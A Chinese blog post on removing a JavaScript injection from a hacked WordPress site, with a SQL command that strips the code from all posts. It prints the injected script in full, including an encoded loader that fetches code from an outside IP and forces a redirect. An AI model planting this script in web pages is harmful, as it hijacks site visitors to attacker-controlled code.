WordPress被SQL注入攻击了怎么办?
WordPress被SQL注入攻击了怎么办?前几天一位老哥的网站上的文章末尾,全部被注入了一个JS代码,进入文章页时会强制跳转,代码如下) WordPress 注入 攻击
前几天一位老哥的网站上的文章末尾,全部被注入了一个JS代码,进入文章页时会强制跳转,代码如下
<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->
我去数据库中查看,在wp_post表的wp_content字段中,也确实发现了这个代码,但是,在数据库搜索这个脚本时,base64后面的字符串每个文章都是不一样的,那就无法使用替代/删除的办法了。要是手动删除2000多个帖子,要删到猴年马月去。最终查询了N多资料后,再国外的一个论坛上找到了解决办法。
UPDATE wp_posts SET post_content =
SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1)
WHERE LOCATE('<!--codes_iframe-->', post_content) >0;
最终使用这行命令清除了2000+文章的恶意脚本
服务范围:WordPress搭建、WordPress主题开发、WordPress二次开发、WordPress插件开发
其它服务:网站建设、企业邮箱、数字证书ssl、400电话、
技术标签:企业网站、外贸网站、外贸商城、其它问题
联系方式:电话:13714666846 微信同号
其它服务:网站建设、企业邮箱、数字证书ssl、400电话、
技术标签:企业网站、外贸网站、外贸商城、其它问题
联系方式:电话:13714666846 微信同号
相似内容
- dedecms转WordPress,织梦ded...阅读:73
- WordPress企业门户网站搭建,...阅读:139
- WordPress企业网站定制开发,...阅读:127
- 网页开发外包公司 wordpress阅读:71
- wordpress的优缺点阅读:109
- wordpress的优点与缺点阅读:108
- 网页设计师如何对网页注入情...阅读:46
- 网站提高百度权重的4个方法-...阅读:92
- 日本苹果id账号怎么注册?阅读:223
- 推特注册怎么跳过手机号码?阅读:3467
- 日本AppleID官网注册入口阅读:632
- 谷歌账号注册无法验证手机什...阅读:274